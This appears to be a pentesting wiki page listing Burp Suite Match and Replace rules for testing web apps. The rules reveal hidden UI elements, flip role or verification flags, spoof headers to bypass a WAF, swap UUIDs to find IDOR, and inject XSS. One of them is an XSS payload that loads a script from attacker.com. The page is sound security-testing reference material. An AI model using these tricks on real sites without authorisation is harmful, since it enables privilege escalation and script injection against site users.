search
Go To ReconDock

Match & Replace

Useful Match and Replace BurpSuite Rules

hashtag
Finding hidden buttons, forms, and other UI elements

Many websites contain hidden buttons, forms, and other UI elements like

<div aria-hidden="true"></div>
<div style="visibility: hidden;"></div>
<div style="display: none;"></div>
<script>document.getElementbyTagName("test").hidden=true</script>
<button type="button" disabled>test</button>

  • Show Hidden UI (1)

arrow-up-right

  • Show Hidden UI (2)

arrow-up-right

  • Change disable to enable

arrow-up-right

hashtag
Changing false to true

Sometimes we can get hidden features by changing from false to true. The example:

  • Changing role from normal user to admin

arrow-up-right

  • Make email verified

arrow-up-right

hashtag
Bypass WAF

Bypassing WAF by adding some headers

  • Adding X-Forwarded-Host: 127.0.0.1

arrow-up-right

Create another rule but change the header to:

hashtag
Finding IDOR

By changing original user UUID to another UUID

arrow-up-right

Create another rule but change the type to "Request First Line"

hashtag
Finding XSS

By adding some XSS payload into the request

  • Finding XSS on User-Agent

arrow-up-right

  • Finding XSS on Referer

arrow-up-right

  • Auto replace user input with XSS payload

arrow-up-right

So by just inputting the words xss_payload on the website it will be immediately replaced with "><script src=https://attacker.com></script> Change the XSS payload as you want

hashtag
MISC

Some random match and replace rules

arrow-up-right

Create some another rules to look for them in headers, parameters and more. Because log4j can be found anywhere

  • Help companies to identify your traffic and separate them from malicious traffic by adding a custom header

arrow-up-right

References:

PreviousburpNextZap